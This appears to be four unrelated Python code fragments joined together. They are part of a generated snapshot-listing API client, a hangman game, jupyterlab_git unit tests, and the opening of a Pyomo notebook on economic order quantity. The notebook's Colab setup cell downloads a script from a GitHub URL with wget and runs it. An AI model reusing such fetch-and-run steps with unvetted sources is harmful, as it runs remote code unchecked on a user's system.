raise ValueError("Invalid value for parameter `resume` when calling `list_snapshot_schedules`, length must be greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'dir' in params:
query_params.append(('dir', params['dir'])) # noqa: E501
if 'resume' in params:
query_params.append(('resume', params['resume'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/snapshot/schedules', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SnapshotSchedulesExtended', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_snapshot_snapshots(self, **kwargs): # noqa: E501
"""list_snapshot_snapshots # noqa: E501
List all or matching snapshots. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_snapshot_snapshots(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort: The field that will be used for sorting. Choices are id, name, path, created, expires, size, has_locks, schedule, alias_target, alias_target_name, pct_filesystem, pct_reserve, and state. Default is id.
:param str schedule: Only list snapshots created by this schedule.
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:param str state: Only list snapshots matching this state.
:param int limit: Return no more than this many results at once (see resume).
:param str type: Only list snapshots matching this type.
:param str dir: The direction of the sort.
:return: SnapshotSnapshotsExtended
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_snapshot_snapshots_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_snapshot_snapshots_with_http_info(**kwargs) # noqa: E501
return data
def list_snapshot_snapshots_with_http_info(self, **kwargs): # noqa: E501
"""list_snapshot_snapshots # noqa: E501
List all or matching snapshots. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_snapshot_snapshots_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str sort: The field that will be used for sorting. Choices are id, name, path, created, expires, size, has_locks, schedule, alias_target, alias_target_name, pct_filesystem, pct_reserve, and state. Default is id.
:param str schedule: Only list snapshots created by this schedule.
:param str resume: Continue returning results from previous call using this token (token should come from the previous call, resume cannot be used with other options).
:param str state: Only list snapshots matching this state.
:param int limit: Return no more than this many results at once (see resume).
:param str type: Only list snapshots matching this type.
:param str dir: The direction of the sort.
:return: SnapshotSnapshotsExtended
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['sort', 'schedule', 'resume', 'state', 'limit', 'type', 'dir'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_snapshot_snapshots" % key
)
params[key] = val
del params['kwargs']
if ('resume' in params and
len(params['resume']) > 8192):
raise ValueError("Invalid value for parameter `resume` when calling `list_snapshot_snapshots`, length must be less than or equal to `8192`") # noqa: E501
if ('resume' in params and
len(params['resume']) < 0):
raise ValueError("Invalid value for parameter `resume` when calling `list_snapshot_snapshots`, length must be greater than or equal to `0`") # noqa: E501
if 'limit' in params and params['limit'] > 4294967295: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `list_snapshot_snapshots`, must be a value less than or equal to `4294967295`") # noqa: E501
if 'limit' in params and params['limit'] < 1: # noqa: E501
raise ValueError("Invalid value for parameter `limit` when calling `list_snapshot_snapshots`, must be a value greater than or equal to `1`") # noqa: E501
if ('dir' in params and
len(params['dir']) < 0):
raise ValueError("Invalid value for parameter `dir` when calling `list_snapshot_snapshots`, length must be greater than or equal to `0`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'sort' in params:
query_params.append(('sort', params['sort'])) # noqa: E501
if 'schedule' in params:
query_params.append(('schedule', params['schedule'])) # noqa: E501
if 'resume' in params:
query_params.append(('resume', params['resume'])) # noqa: E501
if 'state' in params:
query_params.append(('state', params['state'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'type' in params:
query_params.append(('type', params['type'])) # noqa: E501
if 'dir' in params:
query_params.append(('dir', params['dir'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = | |
word[1] == "z" :
toGuess = toGuess[:1] + "z" + toGuess[2:]
if word[2] == "Z" or word[2] == "z" :
toGuess = toGuess[:2] + "z" + toGuess[3:]
if word[3] == "Z" or word[3] == "z" :
toGuess = toGuess[:3] + "z" + toGuess[4:]
if word[4] == "Z" or word[4] == "z" :
toGuess = toGuess[:4] + "z" + toGuess[5:]
if word[5] == "Z" or word[5] == "z" :
toGuess = toGuess[:5] + "z" + toGuess[6:]
if word[1] != "Z" and word[1] != "z" and word[2] != "Z" and word[2] != "z" and word[3] != "Z" and word[3] != "z" and word[4] != "Z" and word[4] != "z" and word[5] != "Z" and word[5] != "z" :
print("\nWrong!\n")
numberOfErrors = numberOfErrors + 1
wrongChars = wrongChars + "z" + ", "
if numberOfErrors == 0 :
print("\t___________")
print("\t| |")
print("\t|")
print("\t|")
print("\t|")
print("\t|")
print("\t|")
if numberOfErrors == 1 :
print("\t___________")
print("\t| |")
print("\t| O")
print("\t|")
print("\t|")
print("\t|")
print("\t|")
if numberOfErrors == 2 :
print("\t___________")
print("\t| |")
print("\t| O")
print("\t| |")
print("\t|")
print("\t|")
print("\t|")
if numberOfErrors == 3 :
print("\t___________")
print("\t| |")
print("\t| O")
print("\t| /|")
print("\t|")
print("\t|")
print("\t|")
if numberOfErrors == 4 :
print("\t___________")
print("\t| |")
print("\t| O")
print("\t| /|\\")
print("\t|")
print("\t|")
print("\t|")
if numberOfErrors == 5 :
print("\t___________")
print("\t| |")
print("\t| O")
print("\t| /|\\")
print("\t| / ")
print("\t|")
print("\t|")
if numberOfErrors == 6 :
print("\t___________")
print("\t| |")
print("\t| O")
print("\t| /|\\")
print("\t| / \\")
print("\t|")
print("\t|")
print("\nYou lose! GAME OVER\n")
print("The answer was \"" + word + "\"")
loser = True
if not loser :
print("\n\tWord: " + toGuess)
print("\tMisses: " + wrongChars)
if "_" in toGuess and not loser :
guessChar = ""
while not guessChar.isalpha() :
guessChar = input("\n---------------------------------\nEnter your letter: ")
_ = os.system('cls' if os.name=='nt' else 'clear')
if guessChar == "A" or guessChar == "a" :
if word[1] == "A" or word[1] == "a" :
toGuess = toGuess[:1] + "a" + toGuess[2:]
if word[2] == "A" or word[2] == "a" :
toGuess = toGuess[:2] + "a" + toGuess[3:]
if word[3] == "A" or word[3] == "a" :
toGuess = toGuess[:3] + "a" + toGuess[4:]
if word[4] == "A" or word[4] == "a" :
toGuess = toGuess[:4] + "a" + toGuess[5:]
if word[5] == "A" or word[5] == "a" :
toGuess = toGuess[:5] + "a" + toGuess[6:]
if word[1] != "A" and word[1] != "a" and word[2] != "A" and word[2] != "a" and word[3] != "A" and word[3] != "a" and word[4] != "A" and word[4] != "a" and word[5] != "A" and word[5] != "a" :
print("\nWrong!\n")
numberOfErrors = numberOfErrors + 1
wrongChars = wrongChars + "a" + ", "
if guessChar == "B" or guessChar == "b" :
if word[1] == "B" or word[1] == "b" :
toGuess = toGuess[:1] + "b" + toGuess[2:]
if word[2] == "B" or word[2] == "b" :
toGuess = toGuess[:2] + "b" + toGuess[3:]
if word[3] == "B" or word[3] == "b" :
toGuess = toGuess[:3] + "b" + toGuess[4:]
if word[4] == "B" or word[4] == "b" :
toGuess = toGuess[:4] + "b" + toGuess[5:]
if word[5] == "B" or word[5] == "b" :
toGuess = toGuess[:5] + "b" + toGuess[6:]
if word[1] != "B" and word[1] != "b" and word[2] != "B" and word[2] != "b" and word[3] != "B" and word[3] != "b" and word[4] != "B" and word[4] != "b" and word[5] != "B" and word[5] != "b" :
print("\nWrong!\n")
numberOfErrors = numberOfErrors + 1
wrongChars = wrongChars + "b" + ", "
if guessChar == "C" or guessChar == "c" :
if word[1] == "C" or word[1] == "c" :
toGuess = toGuess[:1] + "c" + toGuess[2:]
if word[2] == "C" or word[2] == "c" :
toGuess = toGuess[:2] + "c" + toGuess[3:]
if word[3] == "C" or word[3] == "c" :
toGuess = toGuess[:3] + "c" + toGuess[4:]
if word[4] == "C" or word[4] == "c" :
toGuess = toGuess[:4] + "c" + toGuess[5:]
if word[5] == "C" or word[5] == "c" :
toGuess = toGuess[:5] + "c" + toGuess[6:]
if word[1] != "C" and word[1] != "c" and word[2] != "C" and word[2] != "c" and word[3] != "C" and word[3] != "c" and word[4] != "C" and word[4] != "c" and word[5] != "C" and word[5] != "c" :
print("\nWrong!\n")
numberOfErrors = numberOfErrors + 1
wrongChars = wrongChars + "c" + ", "
if guessChar == "D" or guessChar == "d" :
if word[1] == "D" or word[1] == "d" :
toGuess = toGuess[:1] + "d" + toGuess[2:]
if word[2] == "D" or word[2] == "d" :
toGuess = toGuess[:2] + "d" + toGuess[3:]
if word[3] == "D" or word[3] == "d" :
toGuess = toGuess[:3] + "d" + toGuess[4:]
if word[4] == "D" or word[4] == "d" :
toGuess = toGuess[:4] + "d" + toGuess[5:]
if word[5] == "D" or word[5] == "d" :
toGuess = toGuess[:5] + "d" + toGuess[6:]
if word[1] != "D" and word[1] != "d" and word[2] != "D" and word[2] != "d" and word[3] != "D" and word[3] != "d" and word[4] != "D" and word[4] != "d" and word[5] != "D" and word[5] != "d" :
print("\nWrong!\n")
numberOfErrors = numberOfErrors + 1
wrongChars = wrongChars + "d" + ", "
if guessChar == "E" or guessChar == "e" :
if word[1] == "E" or word[1] == "e" :
toGuess = toGuess[:1] + "e" + toGuess[2:]
if word[2] == "E" or word[2] == "e" :
toGuess = toGuess[:2] + "e" + toGuess[3:]
if word[3] == "E" or word[3] == "e" :
toGuess = toGuess[:3] + "e" + toGuess[4:]
if word[4] == "E" or word[4] == "e" :
toGuess = toGuess[:4] + "e" + toGuess[5:]
if word[5] == "E" or word[5] == "e" :
toGuess = toGuess[:5] + "e" + toGuess[6:]
if word[1] != "E" and word[1] != "e" and word[2] != "E" and word[2] != "e" and word[3] != "E" and word[3] != "e" and word[4] != "E" and word[4] != "e" and word[5] != "E" and word[5] != "e" :
print("\nWrong!\n")
numberOfErrors = numberOfErrors + 1
wrongChars = wrongChars + "e" + ", "
if guessChar == "F" or guessChar == "f" :
if word[1] == "F" or word[1] == "f" :
toGuess = toGuess[:1] + "f" + toGuess[2:]
if word[2] == "F" or word[2] == "f" :
toGuess = toGuess[:2] + "f" + toGuess[3:]
if word[3] == "F" or word[3] == "f" :
toGuess = toGuess[:3] + "f" + toGuess[4:]
if word[4] == "F" or word[4] == "f" :
toGuess = toGuess[:4] + "f" + toGuess[5:]
if word[5] == "F" or word[5] == "f" :
toGuess = toGuess[:5] + "f" + toGuess[6:]
if word[1] != "F" and word[1] != "f" and word[2] != "F" and word[2] != "f" and word[3] != "F" and word[3] != "f" and word[4] != "F" and word[4] != "f" and word[5] != "F" and word[5] != "f" :
print("\nWrong!\n")
numberOfErrors = numberOfErrors + 1
wrongChars = wrongChars + "f" + ", "
if guessChar == "G" or guessChar == "g" :
if word[1] == "G" or word[1] == "g" :
toGuess = toGuess[:1] + "g" + toGuess[2:]
if word[2] == "G" or word[2] == "g" :
toGuess = toGuess[:2] + "g" + toGuess[3:]
if word[3] == "G" or word[3] == "g" :
toGuess = toGuess[:3] + "g" + toGuess[4:]
if word[4] == "G" or word[4] == "g" :
toGuess = toGuess[:4] + "g" + toGuess[5:]
if word[5] == "G" or word[5] == "g" :
toGuess = toGuess[:5] + "g" + toGuess[6:]
if word[1] != "G" and word[1] != "g" and word[2] != "G" and word[2] != "g" and word[3] != "G" and word[3] != "g" and word[4] != "G" and word[4] != "g" and word[5] != "G" and word[5] != "g" :
print("\nWrong!\n")
numberOfErrors = numberOfErrors + 1
wrongChars = wrongChars + "g" + ", "
if guessChar == "H" or guessChar == "h" :
if word[1] == "H" or word[1] == "h" :
toGuess = toGuess[:1] + "h" + toGuess[2:]
if word[2] == "H" or word[2] == "h" :
toGuess = toGuess[:2] + "h" + toGuess[3:]
if word[3] == "H" or word[3] == "h" :
toGuess = toGuess[:3] + "h" + toGuess[4:]
if word[4] == "H" or word[4] == "h" :
toGuess = toGuess[:4] + "h" + toGuess[5:]
if word[5] == "H" or word[5] == "h" :
toGuess = toGuess[:5] + "h" + toGuess[6:]
if word[1] != "H" and word[1] != "h" and word[2] != "H" and word[2] != "h" and word[3] != "H" and word[3] != "h" and word[4] != "H" and word[4] != "h" and word[5] != "H" and word[5] != "h" :
print("\nWrong!\n")
numberOfErrors = numberOfErrors + 1
wrongChars = wrongChars + "h" + ", "
if guessChar == "I" or guessChar == "i" :
if word[1] == "I" or word[1] == "i" :
toGuess = toGuess[:1] + "i" + toGuess[2:]
if word[2] == "I" or word[2] == "i" :
toGuess = toGuess[:2] + "i" + toGuess[3:]
if word[3] | |
from pathlib import Path
from unittest.mock import call, patch
import pytest
from jupyterlab_git.git import Git
from .testutils import maybe_future
@pytest.mark.parametrize(
"branch,expected",
[
("refs/heads/feature-foo", False),
("refs/heads/master", False),
("refs/remotes/origin/feature-foo", True),
("refs/remotes/origin/HEAD", True),
("refs/stash", False),
("refs/tags/v0.1.0", False),
("refs/tags/blah@0.2.0", False),
],
)
def test_is_remote_branch(branch, expected):
actual_response = Git()._is_remote_branch(branch)
assert expected == actual_response
@pytest.mark.asyncio
async def test_get_current_branch_success():
with patch("jupyterlab_git.git.execute") as mock_execute:
# Given
mock_execute.return_value = maybe_future((0, "feature-foo", ""))
# When
actual_response = await (
Git().get_current_branch(path=str(Path("/bin/test_curr_path")))
)
# Then
mock_execute.assert_called_once_with(
["git", "symbolic-ref", "--short", "HEAD"],
cwd=str(Path("/bin") / "test_curr_path"),
)
assert "feature-foo" == actual_response
@pytest.mark.asyncio
async def test_checkout_branch_noref_success():
branch = "test-branch"
curr_path = str(Path("/bin/test_curr_path"))
stdout_message = "checkout output from git"
stderr_message = ""
rc = 0
with patch("jupyterlab_git.git.execute") as mock_execute:
with patch.object(
Git, "_get_branch_reference", return_value=maybe_future(None)
) as mock__get_branch_reference:
# Given
mock_execute.return_value = maybe_future(
(rc, stdout_message, stderr_message)
)
# When
actual_response = await Git().checkout_branch(
branchname=branch, path=curr_path
)
# Then
mock__get_branch_reference.assert_has_calls([call(branch, curr_path)])
cmd = ["git", "checkout", branch]
mock_execute.assert_called_once_with(
cmd,
cwd=str(Path("/bin") / "test_curr_path"),
)
assert {"code": rc, "message": stdout_message} == actual_response
@pytest.mark.asyncio
async def test_checkout_branch_noref_failure():
branch = "test-branch"
curr_path = str(Path("/bin/test_curr_path"))
stdout_message = ""
stderr_message = (
"error: pathspec '{}' did not match any file(s) known to git".format(branch)
)
rc = 1
with patch("jupyterlab_git.git.execute") as mock_execute:
with patch.object(
Git, "_get_branch_reference", return_value=maybe_future(None)
) as mock__get_branch_reference:
# Given
mock_execute.return_value = maybe_future(
(rc, stdout_message, stderr_message)
)
# When
actual_response = await Git().checkout_branch(
branchname=branch, path=curr_path
)
# Then
mock__get_branch_reference.assert_has_calls([call(branch, curr_path)])
cmd = ["git", "checkout", branch]
mock_execute.assert_called_once_with(
cmd,
cwd=str(Path("/bin") / "test_curr_path"),
)
assert {
"code": rc,
"message": stderr_message,
"command": " ".join(cmd),
} == actual_response
@pytest.mark.asyncio
async def test_checkout_branch_remoteref_success():
branch = "origin/test-branch"
local_branch = "test-branch"
curr_path = str(Path("/bin/test_curr_path"))
stdout_message = "checkout output from git"
stderr_message = ""
rc = 0
with patch("jupyterlab_git.git.execute") as mock_execute:
with patch.object(
Git,
"_get_branch_reference",
return_value=maybe_future("refs/remotes/remote_branch"),
) as mock__get_branch_reference:
# Given
mock_execute.return_value = maybe_future(
(rc, stdout_message, stderr_message)
)
# When
actual_response = await Git().checkout_branch(
branchname=branch, path=curr_path
)
# Then
mock__get_branch_reference.assert_has_calls([call(branch, curr_path)])
cmd = ["git", "checkout", "-B", local_branch, branch]
mock_execute.assert_called_once_with(
cmd,
cwd=str(Path("/bin") / "test_curr_path"),
)
assert {"code": rc, "message": stdout_message} == actual_response
@pytest.mark.asyncio
async def test_checkout_branch_headsref_failure():
branch = "test-branch"
curr_path = str(Path("/bin/test_curr_path"))
stdout_message = ""
stderr_message = (
"error: pathspec '{}' did not match any file(s) known to git".format(branch)
)
rc = 1
with patch("jupyterlab_git.git.execute") as mock_execute:
with patch.object(
Git,
"_get_branch_reference",
return_value=maybe_future("refs/heads/local_branch"),
) as mock__get_branch_reference:
# Given
mock_execute.return_value = maybe_future(
(rc, stdout_message, stderr_message)
)
# When
actual_response = await Git().checkout_branch(
branchname=branch, path=curr_path
)
# Then
mock__get_branch_reference.assert_has_calls([call(branch, curr_path)])
cmd = ["git", "checkout", branch]
mock_execute.assert_called_once_with(
cmd,
cwd=str(Path("/bin") / "test_curr_path"),
)
assert {
"code": rc,
"message": stderr_message,
"command": " ".join(cmd),
} == actual_response
@pytest.mark.asyncio
async def test_checkout_branch_headsref_success():
branch = "test-branch"
stdout_message = "checkout output from git"
stderr_message = ""
rc = 0
with patch("jupyterlab_git.git.execute") as mock_execute:
with patch.object(
Git,
"_get_branch_reference",
return_value=maybe_future("refs/heads/local_branch"),
):
# Given
mock_execute.return_value = maybe_future(
(rc, stdout_message, stderr_message)
)
# When
actual_response = await Git().checkout_branch(
branchname=branch, path=str(Path("/bin/test_curr_path"))
)
# Then
cmd = ["git", "checkout", branch]
mock_execute.assert_called_once_with(
cmd,
cwd=str(Path("/bin") / "test_curr_path"),
)
assert {"code": rc, "message": stdout_message} == actual_response
@pytest.mark.asyncio
async def test_checkout_branch_remoteref_failure():
branch = "origin/test-branch"
local_branch = "test-branch"
stdout_message = ""
stderr_message = (
"error: pathspec '{}' did not match any file(s) known to git".format(branch)
)
rc = 1
with patch("jupyterlab_git.git.execute") as mock_execute:
with patch.object(
Git,
"_get_branch_reference",
return_value=maybe_future("refs/remotes/remote_branch"),
):
# Given
mock_execute.return_value = maybe_future(
(rc, stdout_message, stderr_message)
)
# When
actual_response = await Git().checkout_branch(
branchname=branch, path=str(Path("/bin/test_curr_path"))
)
# Then
cmd = ["git", "checkout", "-B", local_branch, branch]
mock_execute.assert_called_once_with(
cmd,
cwd=str(Path("/bin") / "test_curr_path"),
)
assert {
"code": rc,
"message": stderr_message,
"command": " ".join(cmd),
} == actual_response
@pytest.mark.asyncio
async def test_get_branch_reference_success():
with patch("jupyterlab_git.git.execute") as mock_execute:
# Given
actual_response = 0
branch = "test-branch"
reference = "refs/remotes/origin/test_branch"
mock_execute.return_value = maybe_future((0, reference, ""))
# When
actual_response = await Git()._get_branch_reference(
branchname=branch, path=str(Path("/bin/test_curr_path"))
)
# Then
mock_execute.assert_called_once_with(
["git", "rev-parse", "--symbolic-full-name", branch],
cwd=str(Path("/bin") / "test_curr_path"),
)
assert actual_response == reference
@pytest.mark.asyncio
async def test_get_branch_reference_failure():
with patch("jupyterlab_git.git.execute") as mock_execute:
actual_response = 0
branch = "test-branch"
reference = "test-branch"
# Given
mock_execute.return_value = maybe_future(
(
128,
reference,
"fatal: ambiguous argument '{}': unknown revision or path not in the working tree.".format(
branch
),
)
)
# When
actual_response = await Git()._get_branch_reference(
branchname=branch, path=str(Path("/bin/test_curr_path"))
)
# Then
mock_execute.assert_called_once_with(
["git", "rev-parse", "--symbolic-full-name", branch],
cwd=str(Path("/bin") / "test_curr_path"),
)
assert actual_response is None
@pytest.mark.asyncio
async def test_get_current_branch_failure():
with patch("jupyterlab_git.git.execute") as mock_execute:
# Given
mock_execute.return_value = maybe_future(
(
128,
"",
"fatal: Not a git repository (or any of the parent directories): .git",
)
)
# When
with pytest.raises(Exception) as error:
await Git().get_current_branch(path=str(Path("/bin/test_curr_path")))
# Then
mock_execute.assert_called_once_with(
["git", "symbolic-ref", "--short", "HEAD"],
cwd=str(Path("/bin") / "test_curr_path"),
)
assert (
"Error [fatal: Not a git repository (or any of the parent directories): .git] "
"occurred while executing [git symbolic-ref --short HEAD] command to get current branch."
== str(error.value)
)
@pytest.mark.asyncio
async def test_get_current_branch_detached_success():
with patch("jupyterlab_git.git.execute") as mock_execute:
# Given
process_output = [
"* (HEAD detached at origin/feature-foo)",
" master",
" remotes/origin/feature-foo",
" remotes/origin/HEAD",
]
mock_execute.return_value = maybe_future((0, "\n".join(process_output), ""))
# When
actual_response = await Git()._get_current_branch_detached(
path=str(Path("/bin/test_curr_path"))
)
# Then
mock_execute.assert_called_once_with(
["git", "branch", "-a"],
cwd=str(Path("/bin") / "test_curr_path"),
)
assert "(HEAD detached at origin/feature-foo)" == actual_response
@pytest.mark.asyncio
async def test_get_current_branch_detached_failure():
with patch("jupyterlab_git.git.execute") as mock_execute:
# Given
mock_execute.return_value = maybe_future(
(
128,
"",
"fatal: Not a git repository (or any of the parent directories): .git",
)
)
# When
with pytest.raises(Exception) as error:
await Git()._get_current_branch_detached(
path=str(Path("/bin/test_curr_path"))
)
# Then
mock_execute.assert_called_once_with(
["git", "branch", "-a"],
cwd=str(Path("/bin") / "test_curr_path"),
)
assert (
"Error [fatal: Not a git repository (or any of the parent directories): .git] "
"occurred while executing [git branch -a] command to get detached HEAD name."
== str(error.value)
)
@pytest.mark.asyncio
@pytest.mark.parametrize(
"branch,upstream,remotename",
[
("feature-foo", "master", "origin/withslash"),
("master", "master", "origin"),
("feature/bar", "feature-foo", ""),
# Test upstream branch name starts with a letter contained in remote name
("rbranch", "rbranch", "origin"),
],
)
async def test_get_upstream_branch_success(branch, upstream, remotename):
with patch("jupyterlab_git.git.execute") as mock_execute:
# Given
mock_execute.side_effect = [
maybe_future((0, remotename + "/" + upstream, "")),
maybe_future((0, remotename, "")),
]
# When
actual_response = await Git().get_upstream_branch(
path=str(Path("/bin/test_curr_path")), branch_name=branch
)
# Then
mock_execute.assert_has_calls(
[
call(
[
"git",
"rev-parse",
"--abbrev-ref",
"{}@{{upstream}}".format(branch),
],
cwd=str(Path("/bin") / "test_curr_path"),
),
call(
["git", "config", "--local", "branch.{}.remote".format(branch)],
cwd=str(Path("/bin") / "test_curr_path"),
),
],
any_order=False,
)
assert {
"code": 0,
"remote_branch": upstream,
"remote_short_name": remotename,
} == actual_response
@pytest.mark.asyncio
@pytest.mark.parametrize(
"outputs, message",
[
(
(128, "", "fatal: no such branch: 'blah'"),
"Error [fatal: no such branch: 'blah'] "
"occurred while executing [git rev-parse --abbrev-ref blah@{upstream}] command to get upstream branch.",
),
((128, "", "fatal: no upstream configured for branch"), ""),
(
(
128,
"",
"fatal: ambiguous argument 'blah@origin': unknown revision or path not in the working tree.",
),
"",
),
],
)
async def test_get_upstream_branch_failure(outputs, message):
with patch("jupyterlab_git.git.execute") as mock_execute:
# Given
mock_execute.return_value = maybe_future(outputs)
# When
response = await Git().get_upstream_branch(
path=str(Path("/bin/test_curr_path")), branch_name="blah"
)
expected = {
"code": 128,
"command": "git rev-parse --abbrev-ref blah@{upstream}",
"message": outputs[2],
}
assert response == expected
# Then
mock_execute.assert_has_calls(
[
call(
["git", "rev-parse", "--abbrev-ref", "blah@{upstream}"],
cwd=str(Path("/bin") / "test_curr_path"),
)
],
any_order=False,
)
@pytest.mark.asyncio
async def test_get_tag_success():
with patch("jupyterlab_git.git.execute") as mock_execute:
# Given
mock_execute.return_value = maybe_future((0, "v0.3.0", ""))
# When
actual_response = await Git()._get_tag(
path=str(Path("/bin/test_curr_path")),
commit_sha="abcdefghijklmnopqrstuvwxyz01234567890123",
)
# Then
mock_execute.assert_called_once_with(
["git", "describe", "--tags", "abcdefghijklmnopqrstuvwxyz01234567890123"],
cwd=str(Path("/bin") / "test_curr_path"),
)
assert "v0.3.0" == actual_response
@pytest.mark.asyncio
async def test_get_tag_failure():
with patch("jupyterlab_git.git.execute") as mock_execute:
# Given
mock_execute.side_effect = [
maybe_future((128, "", "fatal: Not a valid object name blah")),
maybe_future(
(
128,
"",
"fatal: No tags can describe '01234567899999abcdefghijklmnopqrstuvwxyz'.",
)
),
]
# When
with pytest.raises(Exception) as error:
await Git()._get_tag(
path=str(Path("/bin/test_curr_path")), commit_sha="blah"
)
assert (
"Error [fatal: Not a valid object name blah] "
"occurred while executing [git describe --tags blah] command to get nearest tag associated with branch."
== str(error.value)
)
actual_response = await Git()._get_tag(
path=str(Path("/bin/test_curr_path")),
commit_sha="01234567899999abcdefghijklmnopqrstuvwxyz",
)
assert actual_response is None
# Then
mock_execute.assert_has_calls(
[
call(
["git", "describe", "--tags", "blah"],
cwd=str(Path("/bin") / "test_curr_path"),
),
call(
[
"git",
"describe",
"--tags",
"01234567899999abcdefghijklmnopqrstuvwxyz",
],
cwd=str(Path("/bin") / "test_curr_path"),
),
],
any_order=False,
)
@pytest.mark.asyncio
async def test_no_tags():
with patch("jupyterlab_git.git.execute") as mock_execute:
# Given
mock_execute.return_value = maybe_future(
(128, "", "fatal: No names found, cannot describe anything.\n")
)
# When
actual_response = await Git()._get_tag(
"/path/foo", "768c79ad661598889f29bdf8916f4cc488f5062a"
)
# Then
mock_execute.assert_called_once_with(
["git", "describe", "--tags", "768c79ad661598889f29bdf8916f4cc488f5062a"],
cwd="/path/foo",
)
assert actual_response is None
@pytest.mark.asyncio
async def test_branch_success():
with patch("jupyterlab_git.git.execute") as mock_execute:
# Given
| |
#!/usr/bin/env python
# coding: utf-8
# # Economic Order Quantity
#
# * Demonstrates reformulation of hyperbolic constraints as SOCP with implementation with `pyomo.kernel.conic.quadratic`.
# * Demonstrates direct modeling of the hyperbolic constraint with `pyomo.kernel.conic.rotated_quadratic`.
# * The example is familiar to any MBA/business student, and has a significant range of applications including warehouse operations.
#
# ## Usage notes
#
# * The notebook requires a solver that can handle a conic constraint. Pyomo provides direct interface to the commercial solvers Gurobi and Mosek that include conic solvers. Other nonlinear solvers may solve this problems using more general numerical techniques.
# * On Google Colab use the `gurobi_direct` solver to use the demo version of Gurobi that is included with Google Colab. Note there are size limits for problems using the demo version of Gurobi.
# * For personal installations of Mosek or Gurobi (free licenses available for academic use), use `mosek_direct` or `gurobi_direct`.
# * For use without Gurobi or Mosek, use the `ipopt` solver.
# In[1]:
# Install Pyomo and solvers for Google Colab
import sys
if "google.colab" in sys.modules:
get_ipython().system('wget -N -q https://raw.githubusercontent.com/jckantor/MO-book/main/tools/install_on_colab.py ')
get_ipython().run_line_magic('run', 'install_on_colab.py')
# ## Bibliographic notes
#
# The original formulation and solution of the economic order quantity problem is attributed to <NAME>, but in a curious twist has been [incorrectly cited ince 1931](https://pubsonline.informs.org/doi/abs/10.1287/mnsc.35.7.898). The correct citation is:
#
# ><NAME>. (1915). Operations and Cost (Factory Management Series). <NAME>, Chap IV, pp.48-52. Chicago.
#
# Harris later developed an extensive consulting business and the concept has become embedded in business practice for over 100 years. Harris's single item model was later extended to multiple items sharing a resource constraint. There may be earlier citations, but this model is generally attributed to Ziegler (1982):
#
# > <NAME>. (1982). Solving certain singly constrained convex optimization problems in production planning. Operations Research Letters, 1(6), 246-252.
#
# > <NAME>., & <NAME>. (1995). The nonlinear resource allocation problem. Operations research, 43(4), 670-683. https://www.jstor.org/stable/171693?seq=1
#
# Reformulation of the multi-item EOQ model as a conic program is attributed to Kuo and Mittleman (2004) using techniques described by Lobo, et al. (1998):
#
# > <NAME>., & <NAME>. (2004). Interior point methods for second-order cone programming and OR applications. Computational Optimization and Applications, 28(3), 255-285. https://link.springer.com/content/pdf/10.1023/B:COAP.0000033964.95511.23.pdf
#
# > <NAME>., <NAME>., <NAME>., & <NAME>. (1998). Applications of second-order cone programming. Linear algebra and its applications, 284(1-3), 193-228. https://web.stanford.edu/~boyd/papers/pdf/socp.pdf
#
# The multi-item model has been used didactically many times since 2004. These are representative examples
#
# > <NAME>., & <NAME>. (2018). A guide to conic optimisation and its applications. RAIRO-Operations Research, 52(4-5), 1087-1106. http://www.cs.nott.ac.uk/~pszajp/pubs/conic-guide.pdf
#
# > <NAME>, Laurent (2018). Lecture notes on Optimization Models. https://inst.eecs.berkeley.edu/~ee127/fa19/Lectures/12_socp.pdf
#
# > Mosek Modeling Cookbook, section 3.3.5. https://docs.mosek.com/modeling-cookbook/cqo.html.
#
# ## EOQ Model
#
# ### Classical formulation
#
# The economic order quantity (EOQ) is a classical problem in inventory management attributed in Ford Harris (1915). The problem is to find the size of a that minimizes the cost of maintaining that item in an inventory.
#
# The cost $f(x)$ for maintaining an item in inventory given given an order size $x$ is
#
# $$f(x) = \frac{h x}{2} + \frac{c d}{x}$$
#
# where $x$ is the $h$ is the annual cost of holding an item including any financing charges, $c$ are the fixed costs of placing and receiving an order, and $d$ is the annual demand. The factor $\frac{1}{2}$ is a result of demand depletes the inventory at a constant rate over the year. The economic order quantity is the value of $x$ minimizing $f(x)$
#
# $$
# \begin{align*}
# EOQ = \arg\min_x\ & f(x) = \frac{h x}{2} + \frac{c d}{x} \\
# \text{s.t.}\quad x & > 0 \\
# \end{align*}
# $$
#
# The solution to this problem is found by setting the derivative of $f(x)$ equal to zero.
#
# $$
# \begin{align*}
# EOQ = x^{opt} & = \sqrt{\frac{2 c d}{h}} \\
